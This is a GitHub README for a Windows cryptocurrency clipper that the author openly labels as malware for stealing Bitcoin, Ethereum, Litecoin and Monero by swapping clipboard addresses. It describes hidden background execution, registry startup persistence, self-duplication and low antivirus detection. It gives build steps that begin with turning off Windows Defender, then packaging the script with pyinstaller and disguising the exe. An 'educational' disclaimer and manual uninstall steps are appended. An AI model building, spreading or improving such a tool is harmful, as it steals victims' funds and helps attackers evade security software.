better version - https://github.com/3022-2/raccoon_clipper
Windows crypto clipper - USE MAIN.PYW AS EXE FOR STEALTH AS IT DOESNT HAVE TERMINAL (RUNS IN BACKGROUND HIDDEN)
WARNING: THIS IS MALWARE DESIGNED FOR STEALING CRYPTOCURRENCY. USE UNINSTALL GUIDE IF UNINSTALL CODE FAILS. (not found error doesn't necessarily mean didnt uninstall)
Features
- Supports Bitcoin, Ethereum, Litecoin, Monero
- Has a single use option. (Will only ever clip once and then never again, kind of like a stealth mode)
- Works as .exe
- Duplicates and adds to startup with registry
- Uses powershell to read and set clipboard
- Has an uninstaller
- If single_use is True and a address has been copied the program will exit.
- If single_use is True and the computer restarts the registry (startup) entry will be removed
Before .exe - virustotal - 0/60 detections
As .exe - virustotal - 12/70 detections
How to make into .exe
# Turn of windows defender
# pip install pyinstaller
# pyinstaller --onefile main.pyw
# when .exe is ran it will duplicate, add to startup and monitor clipboard. You can rename and change icon of the exe.
# if computer is turned on and off/restarted the program will run at startup as the task "clppth.exe".DISCLAIMER: The code provided in this repository is intended for educational and malware analysis purposes only. Any use of this code for illegal or unethical activities is strictly prohibited. The author of this code shall not be held responsible for any misuse or damage resulting from its use. Users are solely responsible for ensuring compliance with applicable laws and ethical standards.
For manual uninstall
- Windows key + r
- %appdata%
- Delete folder Storage0 and folder CLPPTH
- Goto registry editor
- Goto Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- Delete entry CLPPTH
Example of usage - sorry for low res video - github shitty 10mb max video upload https://github.com/3022-2/crypto-clipper/assets/82278708/9bfbd0a6-e0e6-41e1-84fa-50aa55f9d813